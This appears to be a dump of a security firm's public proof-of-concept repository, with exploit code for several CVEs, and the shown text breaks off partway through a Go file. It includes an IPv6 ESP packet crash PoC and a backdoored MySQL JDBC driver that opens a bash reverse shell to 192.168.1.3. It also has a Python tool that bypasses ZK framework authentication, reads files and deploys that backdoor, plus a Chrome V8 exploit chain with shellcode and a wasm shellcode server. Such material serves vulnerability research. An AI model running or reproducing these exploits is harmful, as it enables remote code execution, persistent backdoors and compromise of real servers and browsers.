Repository: numencyber/Vulnerability_PoC
Branch: main
Commit: 8fccb7c069f9
Files: 20
Total size: 16.5 MB

Directory structure:
gitextract_jn422405/

├── CVE-2022-34718/
│   └── poc.cpp
├── CVE-2022-36537/
│   ├── Driver.java
│   ├── chromedriver
│   ├── cve-2022-36537.py
│   ├── mysql-connector-java-5.1.48.jar
│   └── requirements.txt
├── CVE-2022-3723/
│   ├── 01.html
│   ├── Readme.md
│   ├── arr.html
│   ├── exp.html
│   ├── go.mod
│   ├── go.sum
│   └── mainHttps.go
├── CVE-2023-23410/
│   └── CVE-2023-23410_poc.c
├── CVE-2023-28231/
│   └── CVE-2023-28231-DHCP-VUL-PoC.cpp
├── CVE-2023-29336/
│   └── poc.cpp
├── CVE-2023-41047/
│   └── CVE-2023-41047.go
├── CVE-2024-24919/
│   └── exp.py
├── CVE-2026-5283/
│   └── poc.html
└── README.md

================================================
FILE CONTENTS
================================================

================================================
FILE: CVE-2022-34718/poc.cpp
================================================
////////////////////////////////////////////////
// ScannerDemo.cpp文件

#include "../common/initsock.h"

#include <windows.h>
#include <stdio.h>

#include "ntddndis.h"

#include "protoutils.h"
#include "ProtoPacket.h"
#include <Stdint.h>
#include "Iphlpapi.h"
#pragma comment(lib, "Iphlpapi.lib")
#pragma comment(lib, "Bcrypt.lib")

#include "../common/comm.h"


DWORD WINAPI SendThread(LPVOID lpParam);
BOOL GetGlobalData();

u_char	g_ucLocalMac[6];	
DWORD	g_dwGatewayIP;		
DWORD	g_dwLocalIP;		
DWORD	g_dwMask;			

CInitSock theSock;
BCRYPT_ALG_HANDLE       m_hAesAlg;
BCRYPT_KEY_HANDLE       m_hKey;
PBYTE                   m_pbKeyObject;
PBYTE                   m_pbIV;

//Handle for Hash
BCRYPT_HASH_HANDLE		m_hHash;
PBYTE					m_pbHashObject;
BCRYPT_ALG_HANDLE		m_hHashAlg;
BYTE rgbHash[0x14];

UCHAR str_SHA1_key[] =
"\xbc\x3d\x6e\x74\x2d\xd2\x13\xbe\x0b\xa9\x42\xb7\x33\xa4\x7a\xf4\x9b\xa2\xa8\x90";
UINT32 spi = htonl(0x861b157c);
void SHA1(PUCHAR str_data, DWORD len)
{
	
	BCRYPT_KEY_HANDLE	hKey = NULL;
	DWORD cbHashObject, cbResult, temp = 0;
	
	DWORD cbData = 0;
	BCryptOpenAlgorithmProvider(&m_hHashAlg, BCRYPT_SHA1_ALGORITHM, NULL, 8);
	//  Determine the size of the Hash object
	BCryptGetProperty(m_hHashAlg, BCRYPT_OBJECT_LENGTH, (PBYTE)&cbHashObject, sizeof(DWORD), &cbResult, 0);
	m_pbHashObject = (PBYTE)malloc(cbHashObject);
	//  Create the Hash object
	BCryptCreateHash(m_hHashAlg, &m_hHash, m_pbHashObject, cbHashObject, str_SHA1_key, 0x14, 0);
	// Hash the data
	BCryptHashData(m_hHash, (PBYTE)str_data, len, 0);
	// Finish the hash
	BCryptFinishHash(m_hHash, rgbHash, 0x14, 0);
	return ;

}
BOOL GetGlobalData()
{
	PIP_ADAPTER_INFO pAdapterInfo = NULL;
	ULONG ulLen = 0;

	::GetAdaptersInfo(pAdapterInfo, &ulLen);
	pAdapterInfo = (PIP_ADAPTER_INFO)::GlobalAlloc(GPTR, ulLen);

	if (::GetAdaptersInfo(pAdapterInfo, &ulLen) == ERROR_SUCCESS)
	{
		if (pAdapterInfo != NULL)
		{
			memcpy(g_ucLocalMac, pAdapterInfo->Address, 6);
			g_dwGatewayIP = ::inet_addr(pAdapterInfo->GatewayList.IpAddress.String);
			g_dwLocalIP = ::inet_addr(pAdapterInfo->IpAddressList.IpAddress.String);
			g_dwMask = ::inet_addr(pAdapterInfo->IpAddressList.IpMask.String);
		}
	}
	::GlobalFree(pAdapterInfo);
	return TRUE;
}
int main()
{
	GetGlobalData();
	if (!ProtoStartService())
	{
		printf(" ProtoStartService() failed %d \n", ::GetLastError());
		return -1;
	}
	HANDLE hControlDevice = ProtoOpenControlDevice();
	if (hControlDevice == INVALID_HANDLE_VALUE)
	{
		printf(" ProtoOpenControlDevice() failed() %d \n", ::GetLastError());
		ProtoStopService();
		return -1;
	}
	CPROTOAdapters adapters;
	if (!adapters.EnumAdapters(hControlDevice))
	{
		printf(" Enume adapter failed \n");
		ProtoStopService();
		return -1;
	}

	CAdapter adapter;
	if (!adapter.OpenAdapter(adapters.m_pwszSymbolicLink[0], FALSE))
	{
		printf(" OpenAdapter failed \n");
		ProtoStopService();
		return -1;
	}

	adapter.SetFilter(	//  NDIS_PACKET_TYPE_PROMISCUOUS|
		NDIS_PACKET_TYPE_DIRECTED |
		NDIS_PACKET_TYPE_MULTICAST | NDIS_PACKET_TYPE_BROADCAST);


	UCHAR ipv6_ESP_Fragment_1[] =
			"\x00\x0c\x29\x1c\x11\x93\x00\x0c\x29\x5c\x9a\x88\x86\xdd\x60\x00"
			"\x00\x00\x00\x38\x32\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x81\x85"
			"\xb1\x51\x19\x43\x54\x19\xfe\x80\x00\x00\x00\x00\x00\x00\xf8\xe5"
			"\x70\x83\x16\x6f\xef\x6b"
			
			"\x41\x41\x41\x41\x00\x00\x00\x21"//SPI+Seq
			"\x2c\x00\x00\x01\x52\x52\x52\x52\x32\x00\x00\x01\x96\x74\xd9\x9d"
			"\x2b\x00\x00\x00\x00\x00\x00\x00\x2b\x00\x00\x00\x00\x00\x00\x00"
			"\x01\x02\x02\x2c"//ESP tail
			"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";//HMAC;
	UCHAR ipv6_ESP_Fragment_2[] =
			"\x00\x0c\x29\x1c\x11\x93\x00\x0c\x29\x5c\x9a\x88\x86\xdd\x60\x00"
			"\x00\x00\x00\x38\x32\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x81\x85"
			"\xb1\x51\x19\x43\x54\x19\xfe\x80\x00\x00\x00\x00\x00\x00\xf8\xe5"
			"\x70\x83\x16\x6f\xef\x6b"
			
			"\x41\x41\x41\x41\x00\x00\x00\x22"//SPI+Seq
			"\x2c\x00\x00\x18\x52\x52\x52\x52\x32\x00\x00\x00\x96\x74\xd9\x9d"
			"\x2b\x00\x00\x00\x00\x00\x00\x00\x2b\x00\x00\x00\x00\x00\x00\x00"
			"\x01\x02\x02\x2c"//ESP tail
			"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";//HMAC;

			
	memcpy(ipv6_ESP_Fragment_1 + 0x36, &spi, 4);
	SHA1(&ipv6_ESP_Fragment_1[0x36], 0x2c);
	memcpy(ipv6_ESP_Fragment_1 + 0x62, rgbHash, 0x0c);

	memcpy(ipv6_ESP_Fragment_2 + 0x36, &spi, 4);
	SHA1(&ipv6_ESP_Fragment_2[0x36], 0x2c);
	memcpy(ipv6_ESP_Fragment_2 + 0x62, rgbHash, 0x0c);

	adapter.SendData(ipv6_ESP_Fragment_1, sizeof(ipv6_ESP_Fragment_1)-1);
	
	adapter.SendData(ipv6_ESP_Fragment_2, sizeof(ipv6_ESP_Fragment_2)-1);

	ProtoStopService();

	return 0;
}







================================================
FILE: CVE-2022-36537/Driver.java
================================================
package com.mysql.jdbc;

import java.sql.*;
import java.util.*;
import java.util.logging.Logger;

/*
    author: Bearcat of www.numencyber.com
    desc  : Mysql jdbc backdoor driver
*/
public class Driver implements java.sql.Driver {
    static {
        String winCmd = "calc";
        String linuxCmd = "bash -i >& /dev/tcp/192.168.1.3/2022 0>&1";

        String[] cmds = null;

        if (System.getProperty("os.name").toLowerCase().contains("win")) {
            cmds = new String[]{"cmd.exe", "/c", winCmd};
        } else {
            cmds = new String[]{"/bin/bash", "-c", linuxCmd};
        }

        try {
            Runtime.getRuntime().exec(cmds);
        } catch (Exception ignored) {
            // do nothing...
        }
    }

 @Override
    public Connection connect(String url, Properties info) throws SQLException {
        return null;
    }

    @Override
    public boolean acceptsURL(String url) throws SQLException {
        return false;
    }

    @Override
    public DriverPropertyInfo[] getPropertyInfo(String url, Properties info) throws SQLException {
        return new DriverPropertyInfo[0];
    }

    @Override
    public int getMajorVersion() {
        return 0;
    }

    @Override
    public int getMinorVersion() {
        return 0;
    }

    @Override
    public boolean jdbcCompliant() {
        return false;
    }

    @Override
    public Logger getParentLogger() throws SQLFeatureNotSupportedException {
        return null;
    }
}

================================================
FILE: CVE-2022-36537/chromedriver
================================================
[File too large to display: 16.4 MB]

================================================
FILE: CVE-2022-36537/cve-2022-36537.py
================================================
#!/usr/bin/env python3
# coding: utf-8
"""
@File    : cve-2022-36537.py
@Time    : 2022/11/11 23:34
@Author  : Bearcat of www.numencyber.com
@Version : 1.0
@Desc    : ZK framework authentication bypass & connectWise r1Soft server backup manager remote code execution.
"""

import sys
import subprocess
import os
import warnings
import re

import zipfile
import shutil

import requests
from requests_toolbelt import MultipartEncoder
import urllib3

from selenium import webdriver
from rich import print as rprint

import argparse

urllib3.disable_warnings()

# proxy = {
#    "http": "http://127.0.0.1:8080"
# }

proxy = {}


# https://chromedriver.storage.googleapis.com/index.html?path=107.0.5304.62/
def bypass_auth1(target):
    warnings.warn("Discard. The bypass auch2 function is simpler to obtain dtid and cookies.", DeprecationWarning)
    rprint("[italic green][*] Bypass authentication.")
    try:
        opt = webdriver.ChromeOptions()
        opt.add_argument('--headless')
        opt.add_argument('--ignore-certificate-errors')
        driver = webdriver.Chrome(executable_path='./chromedriver', options=opt)
        driver.get(target)
        cookie_str = "JSESSIONID=" + driver.get_cookie("JSESSIONID")['value']
        dtid = driver.execute_script("""
            for (var dtid in zk.Desktop.all)
            return dtid
        """)
        return dtid, cookie_str
    except Exception as e:
        rprint("[italic red][-] Bypass authentication failed. {0}".format(e))
        exit()


def bypass_auth2(target):
    rprint("[italic green][*] Bypass authentication.")
    uri = "{0}/login.zul".format(target)
    try:
        result = requests.get(url=uri, timeout=3, verify=False, proxies=proxy)
        cookie_str = result.headers['Set-Cookie'].split(";")[0]
        r = u"dt:'(.*?)',cu:"
        regex = re.compile(r)
        dtid = regex.findall(result.text)[0]
        return dtid, cookie_str
    except Exception as e:
        rprint("[italic red][-] Bypass authentication failed. {0}".format(e))
        exit()


def forward_request(target, next_uri, cookie_str, uuid, dtid):
    uri = "{0}/zkau/upload?uuid={1}&dtid={2}&sid=0&maxsize=-1".format(target, uuid, dtid)
    param = {"nextURI": (None, next_uri)}
    headers = {"Cookie": cookie_str}
    data = MultipartEncoder(param, boundary="----WebKitFormBoundaryCs6yB0zvpfSBbYEp")
    headers["Content-Type"] = data.content_type
    try:
        result = requests.post(url=uri, headers=headers, data=data.to_string(), timeout=3, verify=False, proxies=proxy)
        return result
    except Exception as e:
        rprint("[italic red][-] Forward request failed. {0}".format(e))
        exit()


def read_file(target, filename):
    # get login_dtid
    login_dtid, cookie_str = bypass_auth2(target)
    rprint("[italic green][*] Start reading the file:")
    result = forward_request(target, filename, cookie_str, "101010", login_dtid)
    return "-----file start-----\n{0}\n-----file end-----".format(result.text)


def deploy_jdbc_backdoor(target):
    rprint(
        "[italic red][!] The jdbc backdoor can only be deployed once, please make it persistent, such as rebounding the shell.")
    play_again = input("Whether to continue? (y/n):").lower()
    if play_again[0] != "y":
        exit()
    # get login_dtid
    login_dtid, cookie_str = bypass_auth2(target)
    rprint("[italic green][*] Start deploying the jdbc backdoor.")
    build_jdbc_backdoor()
    # database_dtid and mysql_driver_upload_button_id
    uri = "/Configuration/database-drivers.zul"
    result = forward_request(target, uri, cookie_str, "101010", login_dtid)
    r1 = u"{dt:'(.*?)',cu:"
    regex = re.compile(r1)
    database_dtid = regex.findall(result.text)[0]
    r1 = u"'zul.wgt.Button','(.*?)',"
    regex = re.compile(r1)
    mysql_driver_upload_button_id = regex.findall(result.text)[0]

    uri = "/zkau?dtid={0}&cmd_0=onClick&uuid_0={1}&data_0=%7B%22pageX%22%3A315%2C%22pageY%22%3A120%2C%22which%22%3A1%2C%22x%22%3A39%2C%22y%22%3A23%7D".format(
        database_dtid, mysql_driver_upload_button_id)
    result = forward_request(target, uri, cookie_str, "101010", login_dtid)

    # file_upload_dlg_id and file_upload_id
    r1 = u"zul.fud.FileuploadDlg','(.*?)',"
    regex = re.compile(r1)
    file_upload_dlg_id = regex.findall(result.text)[0]

    r1 = u"zul.wgt.Fileupload','(.*?)',"
    regex = re.compile(r1)
    file_upload_id = regex.findall(result.text)[0]

    uri = "{0}/zkau/upload?uuid={1}&dtid={2}&sid=0&maxsize=-1".format(target, file_upload_id, database_dtid)
    upload_jdbc_backdoor(uri, cookie_str)

    uri = "/zkau?dtid={0}&cmd_0=onMove&opt_0=i&uuid_0={1}&data_0=%7B%22left%22%3A%22716px%22%2C%22top%22%3A%22100px%22%7D&cmd_1=onZIndex&opt_1=i&uuid_1={2}&data_1=%7B%22%22%3A1800%7D&cmd_2=updateResult&data_2=%7B%22contentId%22%3A%22z__ul_0%22%2C%22wid%22%3A%22{3}%22%2C%22sid%22%3A%220%22%7D".format(
        database_dtid, file_upload_dlg_id, file_upload_dlg_id, file_upload_id)
    forward_request(target, uri, cookie_str, "101010", login_dtid)

    uri = "/zkau?dtid={0}&cmd_0=onClose&uuid_0={1}&data_0=%7B%22%22%3Atrue%7D".format(database_dtid,
                                                                                      file_upload_dlg_id)
    forward_request(target, uri, cookie_str, "101010", login_dtid)


def upload_jdbc_backdoor(uri, cookie_str):
    rprint("[italic green][*] Upload the database driver.")
    headers = {"Cookie": cookie_str}
    files = {'file': ('b.jar', open('jdbc_backdoor.jar', 'rb'), 'application/java-archive')}
    try:
        requests.post(uri, files=files, headers=headers, timeout=6, verify=False, proxies=proxy)
    except Exception as e:
        rprint("[italic red][-] Upload the database driver failed. {0}".format(e))
        exit()


def build_jdbc_backdoor():
    rprint("[italic green][*] Compile java code.")
    java_cmd = 'javac -source 1.5 -target 1.5 Driver.java'
    popen = subprocess.Popen(java_cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    popen.stdout.read()

    tmp_path = 'jdbc_jar'
    os.mkdir(tmp_path)
    with zipfile.ZipFile('mysql-connector-java-5.1.48.jar', 'r', zipfile.ZIP_DEFLATED) as unzf:
        unzf.extractall("jdbc_jar")
        unzf.close()
    os.remove('jdbc_jar/com/mysql/jdbc/Driver.class')
    shutil.copy('Driver.class', 'jdbc_jar/com/mysql/jdbc/')

    with zipfile.ZipFile('jdbc_backdoor.jar', 'w', zipfile.ZIP_DEFLATED) as zf:
        for root, dirs, files in os.walk(tmp_path):
            relative_root = '' if root == tmp_path else root.replace(tmp_path, '') + os.sep
            for filename in files:
                zf.write(os.path.join(root, filename), relative_root + filename)
        zf.close()
    shutil.rmtree(tmp_path)

    rprint("[italic green][*] Build jdbc backdoor success.")


def banner():
    rprint("[italic white]CVE-2022-36537:\n\tZK framework authentication bypass")
    rprint("[italic white]\tConnectWise r1Soft server backup manager remote code execution")


def parse_args():
    parser = argparse.ArgumentParser(prog='cve-2022-36537',
                                     formatter_class=argparse.RawTextHelpFormatter,
                                     description='author: Bearcat of www.numencyber.com',
                                     usage='cve-2022-36537.py [options]')
    parser.add_argument('-u', '--url', type=str, default='', help='target url')
    parser.add_argument('-r', '--read', type=str, default='', help='reading the file')
    parser.add_argument('-b', '--build', action="store_true", help='build jdbc backdoor')
    parser.add_argument('-d', '--deploy', action="store_true", help='deploying the jdbc backdoor')

    if len(sys.argv) == 1:
        sys.argv.append('-h')

    args = parser.parse_args()
    return args


if __name__ == '__main__':
    banner()
    args = parse_args()
    if args.url and args.read:
        print(read_file(args.url, args.read))
        exit()
    if args.build:
        build_jdbc_backdoor()
        exit()
    if args.url and args.deploy:
        deploy_jdbc_backdoor(args.url)
        exit()


================================================
FILE: CVE-2022-36537/requirements.txt
================================================
requests==2.28.1
requests_toolbelt==0.10.1
rich==12.6.0
selenium==4.7.2
urllib3==1.25.3


================================================
FILE: CVE-2022-3723/01.html
================================================
<body>
    <div id="iframeContainer"></div>
</body>
<script>
    var arr = [2.2, 2.2];
    window.onload = function () {
        let frame = document.createElement("iframe");
        // 基本设置
        frame.src = "arr.html"; // iframe 的来源
        frame.height = "300px"; // iframe 的高度
        frame.width = "300px"; // iframe 的宽度
        // 将 iframe 插入到 HTML 文档中
        let container = document.getElementById("iframeContainer");
        container.appendChild(frame);
        alert(1);
        % DebugPrint(arr);
        alert(2); 
        let frame2 = document.createElement("iframe");
        // 基本设置
        frame2.src = "exp.html"; // iframe 的来源
        frame2.height = "300px"; // frame2 的高度
        frame2.width = "300px"; // frame2 的宽度
        // 将 frame2 插入到 HTML 文档中
        container.appendChild(frame2);
        alert(1);
        % DebugPrint(arr);
        alert(2);         
    };
</script>

================================================
FILE: CVE-2022-3723/Readme.md
================================================
exploit of CVE-2022-3723

based on google's public poc

================================================
FILE: CVE-2022-3723/arr.html
================================================
<script>
    var dv = new DataView(new ArrayBuffer(0x10));
    function gc() {
        for (var i = 0; i < 0x100; i++) new Array(0x200);
    }
    const to_hex = num => {
        return (num >> 0n).toString(16);
    }
    function biglow(b) {
        dv.setBigUint64(0, b, true);
        return (dv.getUint32(0, true));
    }
    function bighi(b) {
        dv.setBigUint64(0, b, true);
        return (dv.getUint32(4, true));
    }
    function f2big(f) {
        dv.setFloat64(0, f, true);
        return (dv.getBigUint64(0, true));
    }
    function big2f(b) {
        dv.setBigUint64(0, b, true);
        return dv.getFloat64(0, true);
    }
    function flow(f) {
        dv.setFloat64(0, f, true);
        return (dv.getUint32(0, true));
    }
    function fhi(f) {
        dv.setFloat64(0, f, true);
        return (dv.getUint32(4, true));
    }
    function i2f(low, hi) {
        dv.setUint32(0, low, true);
        dv.setUint32(4, hi, true);
        return dv.getFloat64(0, true);
    }
    function majorGc() {
        var arr_stack = [];
        for (let i = 0; i < 80; i++) {
            try {
                arr_stack.push(new ArrayBuffer(0x7ff00000000 + i));
            } catch (msg) {
                break;
            }
        }
    }
    class LeakArrayBuffer extends ArrayBuffer {
        constructor(size) {
            super(size);
            this.rw = [1.7, 1.7];// 0x3ffb333333333333
            this.slot = 0xb33f;//搜索0x1667E，查看改变位置，为leakObj地方
        }
    }
    let shellcode = [2.222372952568011e+127,
        3.4476922241098093e+40,
        -2.5784757691472832e-254,
        -1.476674265851898e-90,
        2.582607795529539e-293,
        2.4887534188622283e+253,
        9.353354960368843e-158,
        1.772861363575525e-297,
        2.941218276584707e+26,
        1.7578789445410664e-302,
        -1.3535215646275278e-183,
        1.19831254e-314];
    var arr = null;
    var buff = null;
    for (let i = 0; i < 0x1000; i++) {
        arr = new Array(1.1, 1.1);
        buff = new LeakArrayBuffer(0x1337);
    }
    majorGc(); gc(); majorGc(); gc(); majorGc(); gc(); majorGc(); gc();
    {
        function leak() {
            function setInnerProperty(o, obj) {
                for (let m = 0; m < 0x100000; m++) {
                    o.inner.foo = obj;
                }
            }
            function foo(str, addr) {
                var o = {
                    inner: {
                        ['foo']: 1.5
                    }
                };
                eval(str);// eval防止内联
                // o.inner.foo = addr;
                return o.inner.foo;
                // return arr;
            };
            % PrepareFunctionForOptimization(foo);
            // optimize setInnerProperty
            foo("setInnerProperty(o, arr);", 1.4);
            majorGc();
            foo("setInnerProperty(o, arr);", 1.4);
            majorGc();
            % OptimizeFunctionOnNextCall(foo);
            let o = foo("setInnerProperty(o, arr);", 1.4);
            // console.log(f2big(o).toString(16));
            return (f2big(o).toString(16));
        }
        let addr = leak();
        fetch(addr, {
            method: 'GET',
            mode: 'no-cors' // 在开发环境中允许不安全连接
        })
            .then(response => {
                % DebugPrint("fuckhere");
                % DebugPrint(arr);
            })  // 你也可以使用 response.json() 如果你知道响应会是 JSON 格式的
            .then(data => {
                new Promise((resolve, reject) => {
                    setTimeout(() => {
                        resolve();
                    }, 2000);
                }).then(() => {
                    if (arr.length !== 2) {
                        alert("length is changed!!check how to exp");
                        console.log("length is changed!!check how to exp");
                        function leakObj(o) {
                            buff.slot = o;
                            return fhi(arr[10]);
                        }
                        function write(addr_low, val) {
                            arr[15] = i2f((addr_low | 1) - 0x8, fhi(arr[15]));
                            buff.rw[0] = val;
                        }
                        function read(addr_low) {
                            arr[15] = i2f((addr_low | 1) - 0x8, fhi(arr[15]));
                            return buff.rw[0];
                        }

                        // randPE_addr = read(function_slot);
                        // alert(f2big(randPE_addr).toString(16).padStart(16, 0));
                        arr_addr = leakObj(shellcode);
                        raw_shellcode_addr = ((flow(read(arr_addr + 0x8))) | 1) - 1 + 0x8;
                        % DebugPrint(shellcode);
                        alert("raw_shellcode_addr:" + raw_shellcode_addr.toString(16).padStart(8, 0));
                        fetch(raw_shellcode_addr.toString(16).padStart(8, 0)+".wasm")
                            .then((response) => response.arrayBuffer())
                            .then((wasmBinary) => WebAssembly.compile(wasmBinary))
                            .then((wasmModule) => WebAssembly.instantiate(wasmModule))
                            .then((wasmInstance) => {
                                const { f } = wasmInstance.exports;
                                % DebugPrint("wasmInstance addr is:");
                                % DebugPrint(wasmInstance);
                                wasmInstance_addr = leakObj(wasmInstance);
                                alert("wasmInstance_addr:"+wasmInstance_addr.toString(16).padStart(8,0));
                                rx_mem_addr = f2big(read(wasmInstance_addr + 0x60));
                                alert("rx_mem_addr:"+rx_mem_addr.toString(16).padStart(16,0));
                                rop_start=rx_mem_addr+0x65dn;
                                // 泄露function地址，修改 backingStore
                                % DebugPrint("main func addr is:");
                                % DebugPrint(f);
                                faddr = leakObj(f);
                                alert("f addr:" + faddr.toString(16).padStart(8, 0));
                                function_slot = flow(read(faddr + 0x18)) + 0x10;
                                alert("function_slot and go to mem to check addr:" + function_slot.toString(16).padStart(8, 0));
                                write(function_slot,big2f(rop_start));
                                alert("check memory");
                                f();
                            });
                    }
                });
            })
            .catch(error => {
                // 在这里处理任何上面的.then()中发生的错误
                console.error('Error:', error);
            });
    }
</script>

================================================
FILE: CVE-2022-3723/exp.html
================================================
<script>
    var arr = [2.2, 2.2];
    function exp() {
        var dv = new DataView(new ArrayBuffer(0x10));
        function gc() {
            for (var i = 0; i < 0x100; i++) new Array(0x200);
        }
        const to_hex = num => {
            return (num >> 0n).toString(16);
        }
        function biglow(b) {
            dv.setBigUint64(0, b);
            return (dv.getUint32(0, true));
        }
        function bighi(b) {
            dv.setBigUint64(0, b);
            return (dv.getUint32(4, true));
        }
        function f2big(f) {
            dv.setFloat64(0, f);
            return (dv.getBigUint64(0, true));
        }
        function big2f(b) {
            dv.setBigUint64(0, b, true);
            return dv.getFloat64(0);
        }
        function flow(f) {
            dv.setFloat64(0, f, true);
            return (dv.getUint32(0, true));
        }
        function fhi(f) {
            dv.setFloat64(0, f, true);
            return (dv.getUint32(4, true));
        }
        function i2f(low, hi) {
            dv.setUint32(0, low, true);
            dv.setUint32(4, hi, true);
            return dv.getFloat64(0, true);
        }
        function majorGc() {
            var arr_stack = [];
            for (let i = 0; i < 80; i++) {
                try {
                    arr_stack.push(new ArrayBuffer(0x7ff00000000 + i));
                } catch (msg) {
                    break;
                }
            }
        }
        function main() {
            var arr = [1.1, 1.1];
            function setInnerProperty(o, obj) {
                for (let m = 0; m < 0x100000; m++) {
                    o.inner.foo = obj;
                }
            }
            // % PrepareFunctionForOptimization(setInnerProperty);
            // % OptimizeFunctionOnNextCall(setInnerProperty);
            function setaddr(str, addr, flag) {
                var o = {
                    inner: {
                        ['foo']: 1.5
                    }
                };
                eval(str);// eval防止内联
                if (flag) {
                    console.log("fuckme");
                    console.log(o.inner.foo)
                }
                o.inner.foo = addr;
                // return o.inner.foo;
                return arr;
            };  
            % PrepareFunctionForOptimization(setaddr);
            // optimize setInnerProperty
            setaddr("setInnerProperty(o, arr,false);", xxx);
            majorGc();
            setaddr("setInnerProperty(o, arr,false);", xxx);
            majorGc();
            % OptimizeFunctionOnNextCall(setaddr);
            // % DebugPrint(arr);
            // 
            let o = setaddr("setInnerProperty(o, arr,true);", xxx);
            %DebugPrint("fuck");
            % DebugPrint(o);
            alert("go to change length");
            o[0]=i2f(flow(o[0]),0x40);
            alert("check Length");
        }
        main();
    };
    exp();
</script>

================================================
FILE: CVE-2022-3723/go.mod
================================================
module httpsServer

go 1.20

require github.com/bytecodealliance/wasmtime-go/v8 v8.0.0


================================================
FILE: CVE-2022-3723/go.sum
================================================
github.com/bytecodealliance/wasmtime-go/v8 v8.0.0 h1:jP4sqm2PHgm3+eQ50zCoCdIyQFkIL/Rtkw6TT8OYPFI=
github.com/bytecodealliance/wasmtime-go/v8 v8.0.0/go.mod h1:tgazNLU7xSC2gfRAM8L4WyE+dgs5yp9FF5/tGebEQyM=
github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c=
github.com/niemeyer/pretty v0.0.0-20200227124842-a10e7caefd8e h1:fD57ERR4JtEqsWbfPhv4DMiApHyliiK5xCTNVSPiaAs=
github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM=
github.com/stretchr/testify v1.8.0 h1:pSgiaMZlXftHpm5L7V1+rVB+AZJydKsMxsQBIJw4PKk=
gopkg.in/check.v1 v1.0.0-20200902074654-038fdea0a05b h1:QRR6H1YWRnHb4Y/HeNFCTJLFVxaq6wH4YuVdsUOr75U=
gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA=


================================================
FILE: CVE-2022-3723/mainHttps.go
================================================
package main

import (
	"errors"
	"flag"
	"fmt"
	"github.com/bytecodealliance/wasmtime-go/v8"
	"io/ioutil"
	"log"
	"math"
	"net/http"
	"os"
	"path"
	"path/filepath"
	"regexp"
	"strconv"
	"strings"
)

var globalFloat float64 = -1

var wasm_code = `
(module
  (func $f (export "f") (param i64)
  (call $f (i64.const 0x12EB9060B0C03148)) ;; 48 31 C0 B0 60 90 EB 12    12EB9060B0C03148
  (call $f (i64.const 0x0BEB9090008B4865)) ;; 65 48 8B 00 90 90 EB 0B    0BEB9090008B4865
  (call $f (i64.const 0x0BEB909018408B48)) ;; 48 8B 40 18 90 90 EB 0B    0BEB909018408B48
  (call $f (i64.const 0x0BEB909030408B48)) ;; 48 8B 40 30 90 90 EB 0B    0BEB909030408B48
  (call $f (i64.const 0x0BEBc08b48C08548)) ;; 48 85 C0 48 8b c0 EB 0B    0BEBc08b48C08548
  (call $f (i64.const 0x0BEB000002D1840F)) ;; 0F 84 D1 02 00 00 EB 0B    0BEB000002D1840F
  (call $f (i64.const 0x0BEB9000320033BA)) ;; BA 33 00 32 00 90 EB 0B    0BEB9000320033BA
  (call $f (i64.const 0x0BEB909020E2C148)) ;; 48 C1 E2 20 90 90 EB 0B    0BEB909020E2C148
  (call $f (i64.const 0x0BEB90004C0045B9)) ;; B9 45 00 4C 00 90 EB 0B    0BEB90004C0045B9
  (call $f (i64.const 0x0BEBdb8b48CA0148)) ;; 48 01 CA 48 8b db EB 0B    0BEBdb8b48CA0148
  (call $f (i64.const 0x0BEB004E0052B941)) ;; 41 B9 52 00 4E 00 EB 0B    0BEB004E0052B941
  (call $f (i64.const 0x0BEB909020E1C149)) ;; 49 C1 E1 20 90 90 EB 0B    0BEB909020E1C149
  (call $f (i64.const 0x0BEB900045004BB9)) ;; B9 4B 00 45 00 90 EB 0B    0BEB900045004BB9
  (call $f (i64.const 0x0BEBc98b48C90149)) ;; 49 01 C9 48 8b c9 EB 0B    0BEBc98b48C90149
  (call $f (i64.const 0x0BEB004C004CB841)) ;; 41 B8 4C 00 4C 00 EB 0B    0BEB004C004CB841
  (call $f (i64.const 0x0BEB909020E0C149)) ;; 49 C1 E0 20 90 90 EB 0B    0BEB909020E0C149
  (call $f (i64.const 0x0BEB900044002EB9)) ;; B9 2E 00 44 00 90 EB 0B    0BEB900044002EB9
  (call $f (i64.const 0x0BEBf68b48C80149)) ;; 49 01 C8 48 8b f6 EB 0B    0BEBf68b48C80149
  (call $f (i64.const 0x0BEB909040488B48)) ;; 48 8B 48 40 90 90 EB 0B    0BEB909040488B48
  (call $f (i64.const 0x0BEB904774C98548)) ;; 48 85 C9 74 47 90 EB 0B    0BEB904774C98548
  (call $f (i64.const 0x0BEB90347509394C)) ;; 4C 39 09 75 34 90 EB 0B    0BEB90347509394C
  (call $f (i64.const 0x0BEB207508513948)) ;; 48 39 51 08 75 20 EB 0B    0BEB207508513948
  (call $f (i64.const 0x0BEB22741041394C)) ;; 4C 39 41 10 74 22 EB 0B    0BEB22741041394C
  (call $f (i64.const 0x0BEBC08548008B48)) ;; 48 8B 00 48 85 C0 EB 0B    0BEBC08548008B48
  (call $f (i64.const 0x0BEB10488B488C75)) ;; 75 8C 48 8B 48 10 EB 0B    0BEB10488B488C75
  (call $f (i64.const 0x0BEB90903C416348)) ;; 48 63 41 3C 90 90 EB 0B    0BEB90903C416348
  (call $f (i64.const 0x0BEBC80148C98949)) ;; 49 89 C9 48 01 C8 EB 0B    0BEBC80148C98949
  (call $f (i64.const 0x0BEB000000880548)) ;; 48 05 88 00 00 00 EB 0B    0BEB000000880548
  (call $f (i64.const 0x0BEB9090C031108B)) ;; 8B 10 31 C0 90 90 EB 0B    0BEB9090C031108B
  (call $f (i64.const 0x0BEBff8b48CA0148)) ;; 48 01 CA 48 8b ff EB 0B    0BEBff8b48CA0148
  (call $f (i64.const 0x0BEB909018528B44)) ;; 44 8B 52 18 90 90 EB 0B    0BEB909018528B44
  (call $f (i64.const 0x0BEB909020428B44)) ;; 44 8B 42 20 90 90 EB 0B    0BEB909020428B44
  (call $f (i64.const 0x0BEB9090245A8B44)) ;; 44 8B 5A 24 90 90 EB 0B    0BEB9090245A8B44
  (call $f (i64.const 0x0BEB1c528bC80149)) ;; 49 01 C8 8b 52 1c EB 0B    0BEB1c528bC80149
